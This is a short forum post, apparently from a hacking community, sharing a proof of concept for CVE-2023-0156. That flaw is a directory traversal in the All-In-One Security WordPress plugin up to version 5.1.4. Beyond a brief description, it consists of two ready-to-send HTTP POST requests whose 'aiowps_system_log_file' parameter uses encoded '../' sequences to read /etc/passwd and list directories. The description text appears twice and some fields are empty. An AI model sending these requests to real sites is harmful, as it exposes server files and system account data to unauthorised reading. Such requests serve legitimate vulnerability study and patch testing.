TheJooj
Phishing Simulation Expert
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
CVE ID: CVE-2023-0156
Vulnerability Type: Directory Traversal
Description: The All-In-One Security (AIOS) plugin for WordPress is vulnerable to directory traversal in versions up to, and including, 5.1.4. This allows authenticated attackers with administrator-level permissions to read the contents of arbitrary files on the server.
Steps to reproduce:
Link:
Reference:
Vulnerability Type: Directory Traversal
Description: The All-In-One Security (AIOS) plugin for WordPress is vulnerable to directory traversal in versions up to, and including, 5.1.4. This allows authenticated attackers with administrator-level permissions to read the contents of arbitrary files on the server.
Steps to reproduce:
Code:
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2 Host: <host> Cookie: <cookies> Content-Length: 125 Content-Type: application/x-www-form-urlencoded _wpnonce=<nonce>&aiowps_system_log_file=..%2F..%2F..%2F..%2Fetc%2Fpasswd&aiowps_search_error_files=View+latest+system+logs
Code:
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2 Host: <host> Cookie: <cookies> Content-Length: 98 Content-Type: application/x-www-form-urlencoded _wpnonce=<nonce>&aiowps_system_log_file=..%2F&aiowps_search_error_files=View+latest+system+logsReference: